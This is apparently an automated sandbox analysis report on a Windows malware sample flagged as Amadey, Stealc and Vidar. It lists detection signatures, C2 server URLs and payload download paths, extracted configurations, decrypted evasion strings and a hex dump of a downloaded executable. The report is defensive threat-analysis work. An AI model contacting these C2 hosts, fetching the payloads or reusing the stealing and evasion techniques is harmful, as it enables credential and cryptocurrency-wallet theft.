Windows Analysis Report
Rnteb46TuM.exe

Overview

General Information

Sample name: Rnteb46TuM.exe
renamed because original name is a hash value
Original sample name: 9c1c20db1d73c66795b9b49f39aff02d621dd06c05d7d3ea1007ac7bcbf3f3cd.exe
Analysis ID: 1465032
MD5: b3badd1cd2cba4f587bd6737d34d3569
SHA1: bc229f10399c3482df1faa98bf7074a4440e82a5
SHA256: 9c1c20db1d73c66795b9b49f39aff02d621dd06c05d7d3ea1007ac7bcbf3f3cd
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Rnteb46TuM.exe Avira: detected
Antivirus detection for URL or domain
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllm Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dllBn Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dllb Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllV Avira URL Cloud: Label: malware
Source: http://85.28.47.4/y Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exeurlencoded Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe5067 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpZ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllh Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phps Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpu Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeFr Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/6 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeX Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exeS Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpft Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 12.2.6e6e496542.exe.410000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.7104.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/ Virustotal: Detection: 16% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllV Virustotal: Detection: 17% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php- Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpV Virustotal: Detection: 22% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php= Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php5 Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://77.91.77.82/ Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/stealc/random.exeurlencoded Virustotal: Detection: 24% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/stealc/random.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Virustotal: Detection: 23% Perma Link
Multi AV Scanner detection for submitted file
Source: Rnteb46TuM.exe Virustotal: Detection: 82% Perma Link
Source: Rnteb46TuM.exe ReversingLabs: Detection: 91%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Rnteb46TuM.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetProcAddress
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: LoadLibraryA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrcatA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: OpenEventA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateEventA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CloseHandle
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: Sleep
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetUserDefaultLangID
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualAllocExNuma
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetSystemInfo
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: HeapAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetComputerNameA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrcpyA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetProcessHeap
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetCurrentProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrlenA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ExitProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetSystemTime
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SystemTimeToFileTime
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: advapi32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: gdi32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: user32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: crypt32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ntdll.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetUserNameA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateDCA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetDeviceCaps
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ReleaseDC
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CryptStringToBinaryA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: sscanf
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VMwareVMware
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: HAL9TH
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: JohnDoe
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: DISPLAY
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: %hu/%hu/%hu
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: http://85.28.47.4
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: /920475a59bac849d.php
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: /69934896f997d5bb/
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: default
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetFileAttributesA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalLock
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: HeapFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetFileSize
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalSize
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: IsWow64Process
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: Process32Next
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLocalTime
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FreeLibrary
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetTimeZoneInformation
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetSystemPowerStatus
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetVolumeInformationA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: Process32First
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLocaleInfoA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetModuleFileNameA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: DeleteFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FindNextFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: LocalFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FindClose
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: LocalAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetFileSizeEx
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ReadFile
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SetFilePointer
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: WriteFile
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FindFirstFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CopyFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualProtect
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLastError
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrcpynA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: MultiByteToWideChar
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: WideCharToMultiByte
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: OpenProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: TerminateProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetCurrentProcessId
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: gdiplus.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ole32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: bcrypt.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: wininet.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: shlwapi.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: shell32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: psapi.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: rstrtmgr.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SelectObject
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: BitBlt
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C7A6C80
Uses 32bit PE files
Source: Rnteb46TuM.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49711
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49711
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49725 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.6:49725
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.6:49728 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49729 -> 85.28.47.4:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
